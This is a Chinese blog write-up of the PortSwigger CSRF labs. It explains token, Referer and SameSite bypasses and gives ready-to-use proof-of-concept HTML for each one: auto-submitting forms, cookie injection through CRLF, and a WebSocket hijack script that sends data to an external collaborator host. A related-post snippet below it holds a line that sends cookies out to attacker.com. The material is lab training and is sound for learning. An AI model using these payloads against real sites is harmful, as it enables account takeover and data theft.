PortSwigger 跨站点请求伪造 (CSRF)

已于 2024-12-25 17:57:53 修改
阅读量1k 收藏 3
点赞数 1
CC 4.0 BY-SA版权
分类专栏: PortSwigger 靶场总结 文章标签: csrf 前端 网络安全 web安全
于 2022-12-10 19:47:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42451330/article/details/128268202

一、什么是跨站点请求伪造 (CSRF)

        跨站点请求伪造(也称为 CSRF)是一个 Web 安全漏洞,允许攻击者诱使用户执行他们不打算执行的操作。

二、如何利用跨站点请求伪造 (CSRF)

        1、没有防御措施的 CSRF 漏洞

(1)在 Burp Suite 中选择要测试或利用的请求。
(2)从右键,选择参与工具 / 生成 CSRF PoC。

(3)Burp Suite 将生成一些 HTML 来触发选定的请求(减去 cookie,这将由受害者的浏览器自动添加)

(4)调整CSRF PoC生成器中的各种选项,以微调攻击的各个方面。

(5)将生成的 HTML 复制到网页中,当从受害者从浏览器中查看该地址,将成功发出并发生所需操作。

        2、通过修改请求方法绕过令牌验证

        应用程序在使用 POST 方法时正确验证令牌,但在使用 GET 方法时跳过验证。

<img src="get请求">

        3、通过缺省令牌参数方式绕过令牌验证

        应用程序会在令牌存在时正确验证令牌,但如果省略令牌,则跳过验证。

        4、当令牌未绑定到用户会话,存在绕过

        应用程序不会验证令牌是否属于发出请求的用户所在的同一会话。相反,应用程序维护它已颁发的令牌的全局池,并接受此池中显示的任何令牌,可通过重新构造本地令牌进行绕过。

        5、当令牌绑定到非cookie会话,存在绕过

        应用程序确实将 CSRF 令牌绑定到 cookie,但不绑定到用于跟踪会话的同一 cookie。当应用程序使用两个不同的框架时,很容易发生这种情况,一个用于会话处理,一个用于CSRF保护。可通过设置cookie中CSRF进行绕过。

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
<img src="https://0a3e005e046cfa2880098f5d00d600dc.web-security-academy.net/?search=1%0d%0acsrfKey=tweLSSpcafxNbRQj7EypJZuTKoDcVxh4%3b%20SameSite=None">
  <body>
    <form action="https://0a3e005e046cfa2880098f5d00d600dc.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="wiener&#64;normal&#45;user&#46;net" />
      <input type="hidden" name="csrf" value="q6AEUqR1lIvR6onMzuXiq12XxcOe37Aw" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

        6、当从 cookie 复制csfr令牌时,存在绕过

        应用程序不维护已颁发令牌的任何服务器端记录,而是在 cookie 和请求参数中复制每个令牌。验证后续请求时,应用程序只需验证在请求参数中提交的令牌是否与 Cookie 中提交的值匹配。这有时被称为针对 CSRF 的“双重提交”防御,提倡这样做是因为它易于实现并且不需要任何服务器端状态。

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0aed008b03104606c176817b00a90088.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="iener&#64;normal&#45;user&#46;net" />
      <input type="hidden" name="csrf" value="1234abcd" />
    </form>
    <img src="https://0aed008b03104606c176817b00a90088.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=1234abcd%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
  </body>
</html>

        7、通过更改referer标头,进行绕过

        默认值: 一般浏览器的默认值是 no-referrer-when-downgrade
        no-referrer: 所有请求不发送 referrer
        no-referrer-when-downgrade: 当请求安全级别下降时不发送 referrer。目前,只有一种情况会发生安全级别下降,即从 HTTPS 到 HTTP。HTTPS 到 HTTP 的资源引用和链接跳转都不会发送 referrer。
        same-origin:对于同源的链接和引用,会发送referrer,其他的不会。
        origin:会发送 referrer,但只会发送源信息。源信息包括访问协议和域名。
        strict-origin:这个相当于 origin 和 no-referrer-when-downgrade 的 AND 合体。即在安全级别下降时不发送 referrer;安全级别未下降时发送源信息。
注意:这个是新加的标准,有些浏览器可能还不支持。
        origin-when-cross-origin:这个相当于 origin 和 same-origin 的 OR 合体。同源的链接和引用,会发送完全的 referrer 信息;但非同源链接和引用时,只发送源信息。
        strict-origin-when-cross-origin:这个比较复杂,同源的链接和引用,会发送 referrer。安全级别下降时不发送 referrer。其它情况下发送源信息。注意:这个是新加的标准,有些浏览器可能还不支持。        
        unsafe-url:无论是否发生协议降级,无论是本站链接还是站外链接,统统都发送 Referrer 信息。正如其名,这是最宽松而最不安全的策略。

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
<meta name="referrer" content="no-referrer">
  <script>history.pushState('', '', '/')</script>
    <form action="https://0ab00049036178f9c075a16100410058.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="ner&#64;normal&#45;user&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

        8、通过规避引用器的验证,进行绕过

        利用服务器标头设置:Referrer-Policy: unsafe-url  (无论是同源请求还是非同源请求,都发送完整的 URL(移除参数信息之后)作为引用地址。(最不安全的策略了))

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/0a06008503daaebbc0dd4d7500ab0047.web-security-academy.net')</script>
    <form action="https://0a06008503daaebbc0dd4d7500ab0047.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="ner&#64;normal&#45;user&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

        9、通过方法覆盖绕过 SameSite Lax

        一些框架也提供了覆盖请求行中指定的方法的方法。例如:

<script>
    document.location = "https://0ad200b9042018c884b87ec800f300a4.web-security-academy.net/my-account/change-email?email=pwned@web-security-academy.net&_method=POST";
</script>

        10、 通过客户端重定向绕过 SameSite Strict

        就浏览器而言,一些客户端重定向根本不是真正的重定向;生成的请求仅被视为普通的独立请求。由于是同一站点请求,因此,无论存在任何限制,都将包括与该站点相关的所有 cookie。

<script>
document.location="https://0abf003a04719b9a80c817fa001100d5.web-security-academy.net/post/comment/confirmation?postId=2/../../my-account/change-email?email=11dcc11cr%40normal-user.net%26submit=1";
</script>

 

       11、通过同级域的 SameSite Strict 绕过

寻找同级域名可利用点,如:xss

注入点为其他二级域名:

https://cms-0aee005f03f2def9801c2b58007100ed.web-security-academ/login?username=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=d

 构造websocket 请求,如果是同站,则会直接卸载cookies

<script>
    var ws = new WebSocket('wss://0aee005f03f2def9801c2b58007100ed.web-security-academy.net/chat');
    ws.onopen = function() {
        ws.send("READY");
    };
    ws.onmessage = function(event) {
        fetch('https://yuwa3t1pbdn1np3feu8r0vkiw925qvek.oastify.com', {method: 'POST', mode: 'no-cors', body: event.data});
    };
</script>

12、通过 Cookie 刷新绕过 SameSite Slack

<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="email" value="pwned@portswigger.net">
</form>
<p>Click anywhere on the page</p>
<script>
    window.onclick = () => {
        window.open('https://YOUR-LAB-ID.web-security-academy.net/social-login');
        setTimeout(changeEmail, 5000);
    }

    function changeEmail() {
        document.forms[0].submit();
    }
</script>

13、Referer 验证中断的 CSRF

原理:通过在referer字段拼接原站点,绕过宽泛的防御。

1、请求头部

Referrer-Policy: unsafe-url

Referrer-Policy是一个HTTP头部字段,用于控制当浏览器从一个页面跳转到另一个页面时,是否发送当前页面的URL(即referrer)到目标页面。

2、请求体:

history.pushState("", "", "/?YOUR-LAB-ID.web-security-academy.net")

history.pushState方法接受三个参数:

  1. stateObject:一个与新的历史记录条目相关联的JavaScript对象。这个对象可以是任何可以被序列化的值,它将在后续的popstate事件事件中作为event.state属性返回。注意,这个对象不会被修改,只是与新的历史记录条目相关联。
  2. title:新页面的标题。尽管现代浏览器大多忽略这个参数,但它仍然是必须的。为了兼容性,可以传递一个空字符串。
  3. newURL:新的URL地址。这个地址应该是同源的,即与当前页面具有相同的协议、域名和端口。如果省略该参数或设置为null,则URL不会改变,但历史记录条目仍然会被添加。
Hello, world!
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0a6600bb04b7120480d8217b009700cc.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="ener&#64;normal&#45;user&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/?0a6600bb04b7120480d8217b009700cc.web-security-academy.net/my-account/change-email');
      document.forms[0].submit();
    </script>
  </body>
</html>

portswigger_CSRF
(∪.∪ )...zzz的博客
05-18 861
这里写自定义目录标题一、cross-site request forgery1. 影响2. CSRF工作3. 构造CSRF 一、cross-site request forgery CSRF 1. 影响 更改用户信息 资金转移等 2. CSRF工作 用户处理特权相关的工作; 更改信息,权限 是基于cookie的会话,仅依靠cookie来确定是用户提出的,没其他验证比如token、refer 3. 构造CSRF ...
PortSwigger——web cache deception
qq_55202378的博客
02-10 915
内容交付网络(Content Delivery Networks,CDN)就是缓存技术,CDN使用缓存将内容的副本存储在世界各地的分布式服务器上,通过从最接近用户的服务器提供内容来加速交付,通过最小化数据传输距离来减少加载时间。另一些则首先根据编码的URL应用缓存规则,然后解码URL并将其转发到下一个服务器,这些行为还可能导致缓存和源服务器解释URL路径的方式不一致。请注意,这只表明资源是可缓存的。如果传入请求的缓存键与前一个请求的缓存键匹配,则该高速缓存认为它们是等价的,并提供缓存响应的副本。
csrf跨站请求伪造portswigger)无防御措施
m0_74741186的博客
12-28 1044
基础csrf学习内容来自portswigger,一个靶场练习,国外的网站,可能需要翻墙。
CSRF跨站请求伪造)详解
最新发布
tubug的博客
06-08 732
CSRF(Cross-Site Request Forgery)是指攻击者诱导用户在已登录某网站的情况下,执行非本意的操作(如转账、改密码等)。它依赖于用户已登录状态下浏览器自动携带 Cookie 的特性。 攻击者发现目标网站存在 CSRF 漏洞,关键操作接口未对请求来源进行身份校验。 攻击者构造包含恶意请求的 Payload(如自动提交的表单、恶意图片、JS 脚本等),并嵌入到钓鱼网页或第三方平台。 通过社交工程手段(如钓鱼邮件、社交消息、伪装广告等)引导用户击该页面或链接。 用
PortSwigger靶场CSRF最新版详细通关记录
LawnCat的博客
02-16 2766
该文章为portswiggerCSRF中绕过token篇。
CSRF跨站请求伪造,含使用教程和测试工具
05-04
CSRF跨站请求伪造,使用OWASP CSRFTester工具可以抓取并伪造请求,其测试原理是,使用代理抓取我们在浏览器中访问过的所有的连接以及所有的表单等信息,通过在CSRFTester中修改相应的表单等信息,重新提交,相当于一次伪造客户端请求,如果修改测试的请求成功被网站服务器接受,则说明存在CSRF漏洞。
PortSwigger靶场练习---令牌验证依赖于请求方法:CSRF where token validation depends on request method
fnd_LN的博客
01-25 530
如果您正在使用 Burp Suite Professional,右键单击请求,然后在上下文菜单中选择“交互工具/生成 CSRF PoC”。或者,如果您使用 Burp Suite Community Edition,请使用以下 HTML 模板。为了解决实验室问题,请使用您的漏洞服务器托管一个 HTML 页面,该页面利用 CSRF 攻击更改查看者的电子邮件地址。它试图阻止 CSRF 攻击,但仅对某些类型的请求采取防御措施。某些应用程序在请求使用 POST 方法时正确验证令牌,但在使用 GET 方法时跳过验证。
跨站请求伪造(CSRF)漏洞详解
CoffeMilk的博客
09-21 1554
跨站请求伪造(Cross-site request forgery 简称:CSRF);是一种冒充受信任用户,向服务器发送非预期请求的攻击方式(它允许攻击者诱使用户执行他们不打算执行的操作;允许攻击者部分绕过同源策略,该策略旨在防止不同网站相互干扰)【CSRF主要利用的是网站对用户网页浏览器的信任】【XSS 利用的是用户对指定网站的信任】。 跨站请求伪造的攻击特性是危害性大但非常隐蔽,攻击者完全可以在用户毫无察觉的情况下发起CSRF攻击。
「 典型安全漏洞系列 」03.跨站请求伪造CSRF详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-14 2271
CSRF 攻击通过在用户不知情的情况下,冒充用户身份向服务器发送请求。由于攻击者可以利用用户在站上已存在的 cookie 进行身份验证,所以这种攻击往往不易被察觉。它与常见的 XSS(跨站脚本攻击)攻击有相似之处,都是利用 Web 应用程序的安全漏洞进行攻击。CSRF常年位于CWE Top10,可见其危害性及普遍性。排名源自CWE官网Note:如果想了解CWE,请参阅「 网络安全常用术语解读 」通用缺陷枚举CWE详解。
带你刷burpsuite官方网络安全学院靶场(练兵场)之客户端漏洞——跨站请求伪造(CSRF)专题
HBohan的博客
08-05 1988
介绍 PortSwigger是信息安全从业者必备工具burpsuite的发行商,作为网络空间安全的领导者,他们为信息安全初学者提供了一个在线的网络安全学院(也称练兵场),在讲解相关漏洞的同时还配套了相关的在线靶场供初学者练习,本系列旨在以梨子这个初学者视角出发对学习该学院内容及靶场练习进行全程记录并为其他初学者提供学习参考,希望能对初学者们有所帮助。 什么是CSRFCSRF全称为cross-site request forgery,译为跨站请求伪造。有的站会采用同源策略,如果想要利用受害者身份去执
「 典型安全漏洞系列 」04.服务器端请求伪造SSRF详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-16 2239
实验室环境为支持库存检查功能的购物网站,存在SSRF漏洞,可以利用漏洞来使用管理员权限删除普通用户。。
红队专题-漏洞挖掘-代码审计
aming小老弟
03-11 1231
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站 A。
JWT 攻击 | PortSwigger(burpsuite官方靶场)| Part 1
bin789456的博客
10-05 6493
是token的一种实现,全称为。以形式来说,它就是一个字符串,将用户的信息保存在一个json字符串中,编码后得到的一个token,这个token有签名功能防篡改认证流程:post提交表单后,后端验证完成生成一个jwt,接下来返回该jwt至客户端,随后请求中带上该jwt,即可工作。传统cookie、session对比:1、JWT数据量小,传输速度快2、由于是json,JWT是跨语言的,应用广3、更适用于移动端,因为它们不支持cookie4、避免csrf,因为不依赖cookie。
postswigger 靶场(CSRF)攻略-- 1.没有防御措施的 CSRF 漏洞
wj33333的博客
11-13 858
没有防御措施的 CSRF 漏洞
HTTP请求走私 | PortSwigger(burpsuite官方靶场)| part 1
bin789456的博客
04-30 2385
写在前面 在开始之前,非常容易弄混的一是,HTTP请求走私究竟发生在哪里? 答案是发生在负载均衡。开始之前,首先需要区别,负载均衡和cdn: 简单来说,负载均衡是一个反向代理,使用它的目的是能够对请求进行有效的分发。因为当前服务器都是分布式的,对于请求也必须做出区分,在负载均衡的两侧分别是请求池和服务器池,它就是通过各种简易或复杂的算法进行分发请求至最优策略的服务器。对于用户来说,仅仅是将请求发往这个代理,无需管后面的,而对于后端数据库,也不管是哪一个用户来进行调度数据,服务器自己来调就行,有着明显的分隔
PortSwigger 基于不安全的反序列化漏洞
weixin_42451330的博客
06-01 759
反序列化漏洞是指攻击者通过在应用程序中注入恶意的序列化对象来利用应用程序的反序列化功能,从而导致应用程序受到攻击的漏洞。在一些编程语言和应用程序中,对象可以被序列化为一些字节流或字符串,然后在不同的应用程序之间传输。当这些对象被接收时,它们需要进行反序列化以恢复原始对象。攻击者可以利用这种反序列化过程来注入恶意的代码和数据,从而导致应用程序执行恶意操作,例如远程命令执行、文件读写、数据库操作等。
PortSwigger 跨站脚本(XSS)
weixin_42451330的博客
11-30 1805
本文介绍PortSwigger靶场 跨站脚本(XSS),包括反射型、存储型、DOM型。如有疑问欢迎私聊。
postswigger 靶场(CSRF)攻略-- 2.令牌验证
wj33333的博客
11-13 340
令牌(token)验证取决于请求方法
PortSwigger Cross-site scripting(xss实验详解,小白也可以看懂!!)
2201_75445650的博客
05-03 1476
PortSwigger XSS实验详解(小白也可以看懂!)
PortSwigger靶场Clickjacking
03-29
<think>好的,用户想了解PortSwigger靶场中关于Clickjacking的攻击示例和防御方法。首先,我需要回忆一下Clickjacking的基本概念,它属于UI层面的攻击,通过透明层或iframe诱导用户击。接下来,用户提到PortSwigger靶场,可能需要具体案例和解决方案。 首先,攻击示例方面,常见的比如覆盖按钮、伪造登录界面。例如,使用iframe加载目标页面,设置透明样式,诱导用户击。PortSwigger可能有类似实验,比如让用户击隐藏的删除按钮。需要具体步骤,比如创建恶意页面,调整iframe属性,CSS设置透明度等。 然后是防御方法,常见的包括设置HTTP头部X-Frame-Options,CSP的frame-ancestors指令,以及使用JavaScript禁止嵌套。可能需要引用OWASP的建议,比如DENY或SAMEORIGIN。另外,有些现代浏览器支持这些头部,但可能需要考虑兼容性。比如X-Frame-Options有三个值,而CSP更灵活,可以指定允许的域名。 用户提供的引用是关于C语言的NULL定义,似乎和当前问题无关,可能需要注意是否需要排除这些干扰,专注于Clickjacking相关的资料。不过引用中提到的指针和内存地址可能和前端安全无关,可以忽略。 可能还需要补充PortSwigger实验的具体步骤,比如如何利用击劫持来达成某个攻击目标,比如修改用户设置或者授权某个操作。防御部分要详细说明如何配置服务器头部,或者前端添加JS代码防止被嵌套。 另外,用户可能想知道如何检测是否存在Clickjacking漏洞,比如检查HTTP响应头是否存在X-Frame-Options或CSP设置。或者使用工具如Burp Suite检查响应头。 最后,生成相关问题时要围绕Clickjacking的扩展,比如其他UI攻击类型,防御措施的比较,或者如何测试防护是否生效。</think>### Clickjacking攻击与防御方法解析 #### 一、Clickjacking攻击原理 Clickjacking(击劫持)通过透明iframe或覆盖层诱导用户击特定元素,例如隐藏的删除按钮或授权按钮。攻击者利用CSS设置$opacity:0$创建透明层,结合定位技术覆盖在诱骗页面上[^1]。 #### 二、PortSwigger靶场攻击示例 1. **基础攻击场景** ```html <style> iframe { position:absolute; opacity:0; z-index:2; } button { position:absolute; z-index:1; } </style> <button>击抽奖</button> <iframe src="https://target-site/settings"></iframe> ``` 当用户击"抽奖"按钮时,实际触发iframe中隐藏的敏感操作(如账户注销)。 2. **Cookie劫持升级** 若目标页面未设置`SameSite`属性,攻击者可结合CSRF获取用户凭证: ```javascript fetch('https://attacker.com/steal?cookie=' + document.cookie) ``` #### 三、防御措施 1. **HTTP响应头控制** - **X-Frame-Options**:设置`DENY`完全禁止嵌套或`SAMEORIGIN`限制同源 ```nginx add_header X-Frame-Options "SAMEORIGIN"; ``` - **Content-Security-Policy**:使用`frame-ancestors`指定可嵌套域名 ```http Content-Security-Policy: frame-ancestors 'self'; ``` 2. **前端脚本防护** ```javascript if (top != self) { top.location = self.location; } ``` 3. **Cookie安全增强** ```http Set-Cookie: session=abc123; SameSite=Lax; Secure ``` #### 四、实验验证方法 1. 使用Burp Suite检查目标响应头是否包含防护策略[^2] 2. 尝试通过`<iframe>`加载目标页面观察是否被阻止
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值